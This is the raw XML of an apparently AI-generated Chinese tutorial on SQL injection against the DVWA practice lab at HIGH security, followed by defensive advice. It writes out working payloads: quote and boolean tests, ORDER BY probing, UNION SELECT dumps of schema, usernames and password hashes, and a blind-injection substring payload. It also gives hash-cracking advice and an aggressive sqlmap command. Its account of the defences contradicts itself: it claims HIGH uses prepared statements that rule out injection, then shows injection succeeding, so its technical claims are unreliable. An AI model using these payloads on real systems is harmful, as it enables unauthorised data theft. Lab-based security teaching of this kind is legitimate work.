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5.0 (Apache licensed) using REFERENCE JAXB in Oracle Java 21 on Linux --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好的，根据您提供的参考资料，我为您整理了一份关于DVWA靶场HIGH级别SQL注入的结构化教学材料。这份材料专为初学者设计，从环境搭建到攻击原理，再到防御措施，力求清晰易懂。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161" w:after="161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44"/>
        </w:rPr>
        <w:t>DVWA靶场HIGH级别SQL注入实战教学指南</w:t>
      </w:r>
    </w:p>
    <w:p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3"/>
        </w:rPr>
        <w:t>一、环境准备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在开始之前，请确保您已准备好以下环境：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Web服务器环境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：推荐使用集成环境如 XAMPP、WAMP、MAMP 或 Docker 容器，确保包含 Apache/Nginx、MySQL 和 PHP。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DVWA靶场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：从官方GitHub仓库下载DVWA（Damn Vulnerable Web Application）并部署到您的Web服务器目录中。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浏览器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：推荐使用 Firefox 或 Chrome，并安装如 HackBar、Burp Suite 等渗透测试辅助插件（可选，但强烈推荐）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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配置安全级别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访问DVWA网站（如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http://localhost/dvwa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使用默认账号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admin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/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password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登录。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在左侧菜单选择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DVWA Security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，将安全级别从默认的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low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或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medium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修改为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high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，然后点击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Submit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1"/>
          <w:numId w:val="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导航至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SQL Injection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页面，即可开始HIGH级别的挑战。</w:t>
      </w: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重要提示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：本教程仅用于教育目的，请在您自己搭建的本地靶场环境中进行练习，切勿对未经授权的网站进行测试。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3"/>
        </w:rPr>
        <w:t>二、HIGH级别注入原理与核心特点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在开始攻击前，理解HIGH级别的防御机制至关重要，这能帮助你明白为什么某些在Low/Medium级别有效的Payload会失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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核心防御机制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使用MySQLi扩展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：代码从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mysql_*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函数（易受攻击）升级为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mysqli_*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函数，支持预处理语句。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预处理语句（Prepared Statements）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：这是最核心的防御。SQL查询的结构（代码）和用户输入的数据被分开发送到数据库服务器。用户输入被严格当作“数据”处理，而不会被当作“代码”执行，从而从根本上杜绝了SQL注入。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严格的输入过滤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：使用了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mysqli_real_escape_string()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函数对输入进行转义，进一步增加了注入难度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 xml:space="preserve"> 限制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：查询结果被限制为只返回一条记录，这使得常规的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注入攻击无法直接回显多条数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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攻击思路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：尽管有上述防御，但HIGH级别的代码实现可能存在逻辑缺陷。我们的目标是找到绕过这些防御的方法，通常需要利用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结合注释符来绕过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，或者在某些情况下退化为盲注（Blind SQL Injection）。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3"/>
        </w:rPr>
        <w:t>三、手工注入步骤（附Payload）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以下步骤基于参考资料中的常见思路整理而成。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步骤1：判断注入点与闭合方式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首先，我们需要确认参数是否存在注入漏洞，以及如何闭合SQL语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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测试Payload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：在ID输入框中输入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并提交。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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预期反应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：页面可能会报错（如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You have an error in your SQL syntax...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），或者显示异常（如无用户信息显示）。这表明单引号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破坏了SQL语句的语法结构，存在字符型注入可能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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确认闭合方式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：尝试使用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AND '1'='1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和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AND '1'='2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。 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AND '1'='1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应该正常显示用户信息（页面内容正常）。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AND '1'='2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应该不显示用户信息或显示异常（页面内容为空或错误）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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如果上述测试成功，则确认存在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字符型SQL注入漏洞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，且需要使用单引号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来闭合。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步骤2：绕过</w:t>
      </w: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LIMIT 1</w:t>
      </w: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限制（关键步骤）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HIGH级别的查询语句类似于：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SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;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直接使用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会因为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而只返回一条记录，无法获取我们想要的数据。我们需要注释掉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后面的部分。</w:t>
      </w:r>
    </w:p>
    <w:p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绕过Payload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UNION SELECT 1,2 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</w:t>
      </w:r>
    </w:p>
    <w:p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：闭合前面的单引号。</w:t>
      </w:r>
    </w:p>
    <w:p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 1,2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：尝试用两个数字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1,2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来匹配原查询的字段数（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first_name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last_name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numPr>
          <w:ilvl w:val="1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（或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-- -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）：这是MySQL的注释符，用于注释掉原始查询中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及之后的所有代码，使其失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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测试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：提交上述Payload。如果页面正常显示了数字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和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的位置（通常会显示在first_name和last_name处），则说明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成功执行，且我们猜对了字段数。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步骤3：猜解字段数（使用ORDER BY）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如果上一步不确定字段数，可以使用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ORDER BY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子句来探测。</w:t>
      </w:r>
    </w:p>
    <w:p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测试Payload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ORDER BY 1 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（页面正常）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ORDER BY 2 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（页面正常）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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ORDER BY 3 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（页面报错或异常）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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结论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：当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ORDER BY 3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导致页面异常时，说明字段数为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2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。原查询有2个字段（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first_name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last_name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），我们的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也必须提供2个字段。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步骤4：爆库、爆表、爆字段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现在我们可以利用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来获取数据库信息了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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获取当前数据库名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UNION SELECT database(),2 #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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页面会在原本显示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first_name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的位置显示当前数据库名（如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dvwa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numPr>
          <w:ilvl w:val="0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获取所有表名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UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=database() #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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页面会逐条显示当前数据库（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dvwa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）下的所有表名（如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guestbook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等）。记下你感兴趣的表名，例如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获取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users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表的所有列名（字段名）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UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users' #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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页面会显示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表的所有列名（如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user_id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first_name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last_name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password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avatar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等）。记下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user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和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password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。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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获取用户数据（用户名和密码）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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Payload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UNION SELECT user, password FROM users #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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页面会显示所有用户的用户名和对应的密码哈希值（如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admin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,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5f4dcc3b5aa765d61d8327deb882cf99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spacing w:before="199" w:after="19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6"/>
        </w:rPr>
        <w:t>步骤5：密码哈希破解（可选）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获取到的密码是MD5哈希值，你需要使用在线工具（如CrackStation）或Hashcat/John the Ripper等工具进行破解，得到明文密码（如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password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spacing w:before="269" w:after="269"/>
        <w:ind w:left="7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注意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：如果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UNION SELECT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被完全禁用，可能需要退化为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盲注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。通过构造真/假条件（如 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' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE user='admin') = 'a' #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）并观察页面反应差异来逐位猜解数据。参考资料5和7详细介绍了盲注技巧。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3"/>
        </w:rPr>
        <w:t>四、防御措施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了解攻击是为了更好地防御。以下是修复SQL注入漏洞的最佳实践：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使用预处理语句（参数化查询）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：这是最有效、最根本的防御手段。如PHP中的PDO或MySQLi预处理语句，确保用户输入永远被当作数据处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="96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// 安全示例 (MySQLi)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$stmt = $db-&gt;prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');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$stmt-&gt;bind_param('i', $id); // 'i' 表示整数类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans SC" w:hAnsi="Noto Sans SC" w:eastAsia="Noto Sans SC" w:cs="Noto Sans SC"/>
        </w:rPr>
        <w:br/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$stmt-&gt;execute();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans SC" w:hAnsi="Noto Sans SC" w:eastAsia="Noto Sans SC" w:cs="Noto Sans SC"/>
        </w:rPr>
        <w:br/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输入验证与过滤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：对用户输入进行严格的类型和格式检查（如强制ID为整数）。使用白名单验证，只接受预期的字符。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最小权限原则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：为数据库操作账户分配最小必要的权限。例如，Web应用使用的数据库账户不应该有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DROP TABLE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或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FILE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权限。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错误信息处理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：关闭对外的详细错误显示（如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display_errors = Off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），防止信息泄露。自定义通用的错误页面，避免给攻击者提供线索。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使用Web应用防火墙（WAF）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：部署WAF可以帮助检测和拦截常见的SQL注入攻击Payload。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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定期安全审计与代码审查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：定期检查代码中的数据库查询部分，确保都使用了安全的编程实践。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:before="15" w:after="15"/>
        <w:ind w:left="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans SC" w:hAnsi="Noto Sans SC" w:eastAsia="Noto Sans SC" w:cs="Noto Sans SC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="180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33"/>
        </w:rPr>
        <w:t>五、总结与学习建议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HIGH级别的核心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在于理解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预处理语句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如何防御SQL注入，以及如何寻找其逻辑缺陷（如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LIMIT 1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的绕过）。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学习路径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：建议按照 </w:t>
      </w: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Low -&gt; Medium -&gt; High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 xml:space="preserve"> 的顺序练习，体会不同防御措施的差异和绕过思路。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工具辅助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：手工注入是理解原理的最佳方式。熟练后，可以使用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sqlmap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等自动化工具进行高效测试（例如：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sqlmap -u "http://localhost/dvwa/vulnerabilities/sql_injection/?id=1&amp;Submit=Submit#" --cookie="security=high; PHPSESSID=your_session_id" -p id --level=5 --risk=3 --dbs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）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="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/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>深入阅读</w:t>
      </w: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：仔细阅读参考资料中的源码分析部分（如资料2、5、9），理解代码层面的防御与漏洞成因，这是提升能力的关键。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希望这份结构化的指南能帮助你顺利攻克DVWA的HIGH级别SQL注入挑战！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="269" w:after="269"/>
        <w:ind w:left="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans SC" w:hAnsi="Noto Sans SC" w:eastAsia="Noto Sans SC" w:cs="Noto Sans SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans SC" w:hAnsi="Noto Sans SC" w:eastAsia="Noto Sans SC" w:cs="Noto Sans SC"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【以上内容由文心人工智能生成】</w:t>
      </w:r>
    </w:p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  <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15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5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8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9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0">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="bullet"/>
        <w:lvlText w:val=""/>
        <w:pPr>
          <w:ind w:left="1560" w:hanging="360"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="8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Noto Sans SC" w:hAnsi="Noto Sans SC" w:eastAsia="Noto Sans SC" w:cs="Noto Sans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001191110000802100433B12000","Label":"1","ReservedCode1":"8izgAVwwrV66y2i32pryE9U8m4xwp3AW","ProduceID":"ab5c969e1be3b9fa23f49d05ab26e652","ReservedCode2":"8izgAVwwrV66y2i32pryE9U8m4xwp3AW","PropagateID":"ab5c969e1be3b9fa23f49d05ab26e652","ContentProducer":"001191110000802100433B12000"}</vt:lpwstr>
  </property>
</Properties>
</file>